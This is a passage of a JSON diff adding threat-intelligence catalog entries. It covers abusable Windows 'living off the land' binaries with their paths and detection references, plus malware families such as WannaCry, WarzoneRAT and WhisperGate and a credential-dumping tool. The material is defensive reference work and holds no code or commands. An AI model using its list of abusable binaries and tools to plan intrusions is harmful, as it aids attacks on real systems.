"[[vsjitdebugger.exe - LOLBAS Project](/references/94a880fa-70b0-46c3-997e-b22dc9180134)]", + "meta": { + "id": "d3b7d227-e39a-498b-8a01-2224bdcbdb9e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "34ba500e-c37c-45ec-abf4-16e2f76d82c8", + "type": "similar" + } + ], + "uuid": "bf3acc6a-9193-48fc-b4bb-5cca12bfa006", + "value": "vsjitdebugger.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Just-In-Time (JIT) debugger included with Visual Studio\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\windows\\system32\\vsjitdebugger.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/990758590020452353](https://twitter.com/pabraeken/status/990758590020452353)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_use_of_vsjitdebugger_bin.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml)[[vsjitdebugger.exe - LOLBAS Project](/references/94a880fa-70b0-46c3-997e-b22dc9180134)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5248", + "source": "Tidal Cyber", + "tags": [ + "71bc284c-bfce-4191-80e0-ef70ff4315bf", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "bf3acc6a-9193-48fc-b4bb-5cca12bfa006", + "type": "similar" + } + ], + "uuid": "34ba500e-c37c-45ec-abf4-16e2f76d82c8", + "value": "vsjitdebugger" + }, + { + "description": "[[vsls-agent.exe - LOLBAS Project](/references/325eab54-bcdd-4a12-ab41-aaf06a0405e9)]", + "meta": { + "id": "48f4e3f9-644b-4253-806a-a1a0d5977172", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "99f752db-12c4-45a7-9f7b-f4fcda033462", + "type": "similar" + } + ], + "uuid": "f4a64cb4-78af-4343-8d36-1c2e63b943ee", + "value": "vsls-agent.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Agent for Visual Studio Live Share (Code Collaboration)\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe\n\n**Resources:**\n* [https://twitter.com/bohops/status/1583916360404729857](https://twitter.com/bohops/status/1583916360404729857)\n\n**Detection:**\n* Sigma: [proc_creation_win_vslsagent_agentextensionpath_load.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml)[[vsls-agent.exe - LOLBAS Project](/references/325eab54-bcdd-4a12-ab41-aaf06a0405e9)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5253", + "source": "Tidal Cyber", + "tags": [ + "375cb8ad-2b6a-49b7-8eb3-757aaaf72d8b", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "f4a64cb4-78af-4343-8d36-1c2e63b943ee", + "type": "similar" + } + ], + "uuid": "99f752db-12c4-45a7-9f7b-f4fcda033462", + "value": "vsls-agent" + }, + { + "description": "[[vstest.console.exe - LOLBAS Project](/references/70c168a0-9ddf-408d-ba29-885c0c5c936a)]", + "meta": { + "id": "247c9452-e8dc-41df-89de-e5617c1272d6", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "dfbe173f-5c36-4596-aefb-7ccf504e03c8", + "type": "similar" + } + ], + "uuid": "eda03dc8-1816-4701-868f-c3c73ec62384", + "value": "vstest.console.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** VSTest.Console.exe is the command-line tool to run tests\n\n**Author:** Onat Uzunyayla\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe\n\n**Resources:**\n* [https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022](https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022)\n\n**Detection:**\n* IOC: vstest.console.exe spawning unexpected processes[[vstest.console.exe - LOLBAS Project](/references/70c168a0-9ddf-408d-ba29-885c0c5c936a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5254", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "eda03dc8-1816-4701-868f-c3c73ec62384", + "type": "similar" + } + ], + "uuid": "dfbe173f-5c36-4596-aefb-7ccf504e03c8", + "value": "vstest.console" + }, + { + "description": "[[Wab.exe - LOLBAS Project](/references/c432556e-c7f9-4e36-af7e-d7bea6f51e95)]", + "meta": { + "id": "9672c2e5-1792-4bb8-a16c-6669ee5f99b1", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "6cbd62e8-9024-42d7-93d5-6b8b3409425b", + "type": "similar" + } + ], + "uuid": "5de40634-9b96-422d-98e0-db9fe0dad5fb", + "value": "Wab.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows address book manager\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files\\Windows Mail\\wab.exe\n* C:\\Program Files (x86)\\Windows Mail\\wab.exe\n\n**Resources:**\n* [https://twitter.com/Hexacorn/status/991447379864932352](https://twitter.com/Hexacorn/status/991447379864932352)\n* [http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/](http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/)\n\n**Detection:**\n* Sigma: [registry_set_wab_dllpath_reg_change.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml)\n* IOC: WAB.exe should normally never be used[[Wab.exe - LOLBAS Project](/references/c432556e-c7f9-4e36-af7e-d7bea6f51e95)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5173", + "source": "Tidal Cyber", + "tags": [ + "a53c9f4b-6f0d-4afa-b1ac-8e2d91279210", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5de40634-9b96-422d-98e0-db9fe0dad5fb", + "type": "similar" + } + ], + "uuid": "6cbd62e8-9024-42d7-93d5-6b8b3409425b", + "value": "Wab" + }, + { + "description": "[[LogRhythm WannaCry](https://app.tidalcyber.com/references/305d0742-154a-44af-8686-c6d8bd7f8636)]", + "meta": { + "id": "cff39ad6-363d-44f4-8478-77fdf3b35a26" + }, + "related": [ + { + "dest-uuid": "6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a", + "type": "similar" + } + ], + "uuid": "6d001330-b6ae-4e34-bd64-f1832b53047a", + "value": "WanaCrypt0r" + }, + { + "description": "[[LogRhythm WannaCry](https://app.tidalcyber.com/references/305d0742-154a-44af-8686-c6d8bd7f8636)][[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]", + "meta": { + "id": "e46b3a86-4e74-4485-a8f8-68b28086155a" + }, + "related": [ + { + "dest-uuid": "6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a", + "type": "similar" + } + ], + "uuid": "16059e86-c89f-40de-a3e7-cee9f210228c", + "value": "WCry" + }, + { + "description": "[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]", + "meta": { + "id": "c4167a40-dfc1-4ecb-96bc-51ef86a92438" + }, + "related": [ + { + "dest-uuid": "6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a", + "type": "similar" + } + ], + "uuid": "a0cee897-ba88-4c1b-a1c6-f811baf608cc", + "value": "WanaCry" + }, + { + "description": "[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]", + "meta": { + "id": "b142f212-46e9-4623-a5af-9fb8a80696cc" + }, + "related": [ + { + "dest-uuid": "6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a", + "type": "similar" + } + ], + "uuid": "a4d2e9a7-b785-4385-b85e-51ea8f048de2", + "value": "WanaCrypt" + }, + { + "description": "[WannaCry](https://app.tidalcyber.com/software/6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.[[LogRhythm WannaCry](https://app.tidalcyber.com/references/305d0742-154a-44af-8686-c6d8bd7f8636)][[US-CERT WannaCry 2017](https://app.tidalcyber.com/references/349b8e9d-7172-4d01-b150-f0371d038b7e)][[Washington Post WannaCry 2017](https://app.tidalcyber.com/references/bbf9b08a-072c-4fb9-8c3c-cb6f91e8940c)][[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0366", + "source": "MITRE", + "tags": [ + "45795633-a32b-4d9e-8620-4044ac056647", + "09de661e-60c4-43fb-bfef-df017215d1d8", + "5a463cb3-451d-47f7-93e4-1886150697ce", + "c2380542-36f2-4922-9ed2-80ced06645c9", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172", + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "type": "similar" + }, + { + "dest-uuid": "6d001330-b6ae-4e34-bd64-f1832b53047a", + "type": "similar" + }, + { + "dest-uuid": "16059e86-c89f-40de-a3e7-cee9f210228c", + "type": "similar" + }, + { + "dest-uuid": "a0cee897-ba88-4c1b-a1c6-f811baf608cc", + "type": "similar" + }, + { + "dest-uuid": "a4d2e9a7-b785-4385-b85e-51ea8f048de2", + "type": "similar" + } + ], + "uuid": "6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a", + "value": "WannaCry" + }, + { + "description": "[[Check Point Warzone Feb 2020](https://app.tidalcyber.com/references/c214c36e-2bc7-4b98-a74e-529aae99f9cf)][[Uptycs Warzone UAC Bypass November 2020](https://app.tidalcyber.com/references/1324b314-a4d9-43e7-81d6-70b6917fe527)]", + "meta": { + "id": "b8f67b24-f8ef-4695-bca1-46e2681029f7" + }, + "related": [ + { + "dest-uuid": "cfebe868-15cb-4be5-b7ed-38b52f2a0722", + "type": "similar" + } + ], + "uuid": "50fda745-505f-47ca-b141-0ed2a48e5bfe", + "value": "Ave Maria" + }, + { + "description": "", + "meta": { + "id": "d2a4f820-7771-4bce-8968-0f0a4a35e33d" + }, + "related": [ + { + "dest-uuid": "cfebe868-15cb-4be5-b7ed-38b52f2a0722", + "type": "similar" + } + ], + "uuid": "d68a20f3-9abb-4c63-9df4-cb73bf291473", + "value": "Warzone" + }, + { + "description": "[WarzoneRAT](https://app.tidalcyber.com/software/cfebe868-15cb-4be5-b7ed-38b52f2a0722) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.[[Check Point Warzone Feb 2020](https://app.tidalcyber.com/references/c214c36e-2bc7-4b98-a74e-529aae99f9cf)][[Uptycs Warzone UAC Bypass November 2020](https://app.tidalcyber.com/references/1324b314-a4d9-43e7-81d6-70b6917fe527)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0670", + "source": "MITRE", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d0f29889-7a9c-44d8-abdc-480b371f7b2b", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "type": "used-by" + }, + { + "dest-uuid": "fde19a18-e502-467f-be14-58c71b4e7f4b", + "type": "similar" + }, + { + "dest-uuid": "50fda745-505f-47ca-b141-0ed2a48e5bfe", + "type": "similar" + }, + { + "dest-uuid": "d68a20f3-9abb-4c63-9df4-cb73bf291473", + "type": "similar" + } + ], + "uuid": "cfebe868-15cb-4be5-b7ed-38b52f2a0722", + "value": "WarzoneRAT" + }, + { + "description": "[WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad) is a ransomware family attributed to [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) that has been used since at least May 2020. [WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad) has been used against a broad variety of sectors, including manufacturing, information technology, and media.[[Symantec WastedLocker June 2020](https://app.tidalcyber.com/references/061d8f74-a202-4089-acae-687e4f96933b)][[NCC Group WastedLocker June 2020](https://app.tidalcyber.com/references/1520f2e5-2689-428f-9ee4-05e153a52381)][[Sentinel Labs WastedLocker July 2020](https://app.tidalcyber.com/references/5ed4eb07-cc90-46bc-8527-0bb59e1eefe1)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0612", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "used-by" + }, + { + "dest-uuid": "46cbafbc-8907-42d3-9002-5327c26f8927", + "type": "similar" + } + ], + "uuid": "0ba6ee8d-2b29-4980-8e55-348ea05f00ad", + "value": "WastedLocker" + }, + { + "description": "[Waterbear](https://app.tidalcyber.com/software/56872a5b-dc01-455c-85d5-06c577abb030) is modular malware attributed to [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.[[Trend Micro Waterbear December 2019](https://app.tidalcyber.com/references/bf320133-3823-4232-b7d2-d07da9bbccc2)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0579", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "used-by" + }, + { + "dest-uuid": "f3f1fbed-7e29-49cb-8579-4a378f858deb", + "type": "similar" + } + ], + "uuid": "56872a5b-dc01-455c-85d5-06c577abb030", + "value": "Waterbear" + }, + { + "description": "[WEBC2](https://app.tidalcyber.com/software/f228af8f-8938-4836-9461-c6ca220ed7c5) is a family of backdoor malware used by [APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) as early as July 2006. [WEBC2](https://app.tidalcyber.com/software/f228af8f-8938-4836-9461-c6ca220ed7c5) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. [[Mandiant APT1 Appendix](https://app.tidalcyber.com/references/1f31c09c-6a93-4142-8333-154138c1d70a)][[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0109", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "1d808f62-cf63-4063-9727-ff6132514c22", + "type": "similar" + } + ], + "uuid": "f228af8f-8938-4836-9461-c6ca220ed7c5", + "value": "WEBC2" + }, + { + "description": "[WellMail](https://app.tidalcyber.com/software/b936a1b3-5493-4d6c-9b69-29addeace418) is a lightweight malware written in Golang used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447), similar in design and structure to [WellMess](https://app.tidalcyber.com/software/20725ec7-ee35-44cf-bed6-91158aa03ce4).[[CISA WellMail July 2020](https://app.tidalcyber.com/references/2f33b88a-a8dd-445b-a34f-e356b94bed35)][[NCSC APT29 July 2020](https://app.tidalcyber.com/references/28da86a6-4ca1-4bb4-a401-d4aa469c0034)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0515", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "959f3b19-2dc8-48d5-8942-c66813a5101a", + "type": "similar" + } + ], + "uuid": "b936a1b3-5493-4d6c-9b69-29addeace418", + "value": "WellMail" + }, + { + "description": "[WellMess](https://app.tidalcyber.com/software/20725ec7-ee35-44cf-bed6-91158aa03ce4) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447).[[CISA WellMess July 2020](https://app.tidalcyber.com/references/40e9eda2-51a2-4fd8-b0b1-7d2c6deca820)][[PWC WellMess July 2020](https://app.tidalcyber.com/references/22794e37-3c55-444a-b659-e5a1a6bc2da0)][[NCSC APT29 July 2020](https://app.tidalcyber.com/references/28da86a6-4ca1-4bb4-a401-d4aa469c0034)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0514", + "source": "MITRE", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "3a4197ae-ec63-4162-907b-9a073d1157e4", + "type": "similar" + } + ], + "uuid": "20725ec7-ee35-44cf-bed6-91158aa03ce4", + "value": "WellMess" + }, + { + "description": "[Wevtutil](https://app.tidalcyber.com/software/2bcbcea6-192a-4501-aab1-1edde53875fa) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.[[Wevtutil Microsoft Documentation](https://app.tidalcyber.com/references/25511dde-9e13-4e03-8ae4-2495e9f5eb5e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0645", + "source": "MITRE", + "tags": [ + "5db11c6f-cba4-4865-b993-7a3aafd0f037", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "cd1b5d44-226e-4405-8985-800492cf2865", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "type": "used-by" + }, + { + "dest-uuid": "f91162cc-1686-4ff8-8115-bf3f61a4cc7a", + "type": "similar" + } + ], + "uuid": "2bcbcea6-192a-4501-aab1-1edde53875fa", + "value": "Wevtutil" + }, + { + "description": "[[Wfc.exe - LOLBAS Project](/references/a937012a-01c8-457c-8808-47c1753e8781)]", + "meta": { + "id": "9587218f-04bb-436a-b5a1-c7c524195165", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "dadd1243-6a4a-4ce2-9eea-1c530e7510d9", + "type": "similar" + } + ], + "uuid": "eda6736e-ffb9-4ef9-8d1a-38b3848e4ba4", + "value": "Wfc.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe\n\n**Resources:**\n* [https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/](https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_wfc.yml](https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml)\n* IOC: As a Windows SDK binary, execution on a system may be suspicious[[Wfc.exe - LOLBAS Project](/references/a937012a-01c8-457c-8808-47c1753e8781)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5249", + "source": "Tidal Cyber", + "tags": [ + "be621f15-1788-490f-b8bb-85511a5a8074", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "eda6736e-ffb9-4ef9-8d1a-38b3848e4ba4", + "type": "similar" + } + ], + "uuid": "dadd1243-6a4a-4ce2-9eea-1c530e7510d9", + "value": "Wfc" + }, + { + "description": "[WhisperGate](https://app.tidalcyber.com/software/791f0afd-c2c4-4e23-8aee-1d14462667f5) is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.[[Cybereason WhisperGate February 2022](https://app.tidalcyber.com/references/464d9cac-04c7-4e57-a5d6-604fba90a982)][[Unit 42 WhisperGate January 2022](https://app.tidalcyber.com/references/3daa8c9e-da17-4eda-aa0d-df97c5de8f64)][[Microsoft WhisperGate January 2022](https://app.tidalcyber.com/references/e0c1fcd3-b7a8-42af-8984-873a6f969975)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0689", + "source": "MITRE", + "tags": [ + "2e621fc5-dea4-4cb9-987e-305845986cd3" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "used-by" + }, + { + "dest-uuid": "49fee0b0-390e-4bde-97f8-97ed46bd19b7", + "type": "similar" + } + ], + "uuid": "791f0afd-c2c4-4e23-8aee-1d14462667f5", + "value": "WhisperGate" + }, + { + "description": "[Wiarp](https://app.tidalcyber.com/software/7b393608-c141-48af-ae3d-3eff13c3e01c) is a trojan used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) to open a backdoor on compromised hosts. [[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[Symantec Wiarp May 2012](https://app.tidalcyber.com/references/78285833-4b0d-4077-86d2-f34b010a5862)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0206", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "used-by" + }, + { + "dest-uuid": "039814a0-88de-46c5-a4fb-b293db21880a", + "type": "similar" + } + ], + "uuid": "7b393608-c141-48af-ae3d-3eff13c3e01c", + "value": "Wiarp" + }, + { + "description": "", + "meta": { + "id": "740a6325-6027-4b7f-89d4-bbd9c1bf1196" + }, + "related": [ + { + "dest-uuid": "7c2c44d7-b307-4e13-b181-52352975a6f5", + "type": "similar" + } + ], + "uuid": "e0f8b025-b8bc-4878-b47e-5ea82fc334c8", + "value": "WCE" + }, + { + "description": "[Windows Credential Editor](https://app.tidalcyber.com/software/7c2c44d7-b307-4e13-b181-52352975a6f5) is a password dumping tool. [[Amplia WCE](https://app.tidalcyber.com/references/790ea33a-7a64-488e-ab90-d82e021e0c06)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0005", + "source": "MITRE", + "tags": [ + "1d306cbd-9894-4322-a233-b1576b8e25ba" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "7902f5cc-d6a5-4a57-8d54-4c75e0c58b83", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "type": "similar" + }, + { + "dest-uuid": "e0f8b025-b8bc-4878-b47e-5ea82fc334c8", + "type": "similar" + } + ], + "uuid": "7c2c44d7-b307-4e13-b181-52352975a6f5", + "value": "Windows Credential Editor" + }, + { + "description": "[WINDSHIELD](https://app.tidalcyber.com/software/ed50dcf7-e283-451e-95b1-a8485f8dd214) is a signature backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). [[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)]", + "meta": { + "platforms": [], + "software_attack_id": "S0155", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "98e8a977-3416-43aa-87fa-33e287e9c14c", + "type": "similar" + } + ], + "uuid": "ed50dcf7-e283-451e-95b1-a8485f8dd214", + "value": "WINDSHIELD" + }, + { + "description": "[WindTail](https://app.tidalcyber.com/software/3afe711d-ed58-4c94-a9b6-9c847e1e8a2f) is a macOS surveillance implant used by [Windshift](https://app.tidalcyber.com/groups/4e880d01-313a-4926-8470-78c48824aa82). [WindTail](https://app.tidalcyber.com/software/3afe711d-ed58-4c94-a9b6-9c847e1e8a2f) shares code similarities with Hack Back aka KitM OSX.[[SANS Windshift August 2018](https://app.tidalcyber.com/references/97eac0f2-d528-4f7c-8425-7531eae4fc39)][[objective-see windtail1 dec 2018](https://app.tidalcyber.com/references/7a32c962-8050-45de-8b90-8644be5109d9)][[objective-see windtail2 jan 2019](https://app.tidalcyber.com/references/e6bdc679-ee0c-4f34-b5bc-0d6a26485b36)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0466", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4e880d01-313a-4926-8470-78c48824aa82", + "type": "used-by" + }, + { + "dest-uuid": "0d1f9f5b-11ea-42c3-b5f4-63cce0122541", + "type": "similar" + } + ], + "uuid": "3afe711d-ed58-4c94-a9b6-9c847e1e8a2f", + "value": "WindTail" + }, + { + "description": "[WINERACK](https://app.tidalcyber.com/software/5f994df7-55b0-4383-8ebc-506d4987292a) is a backdoor used by 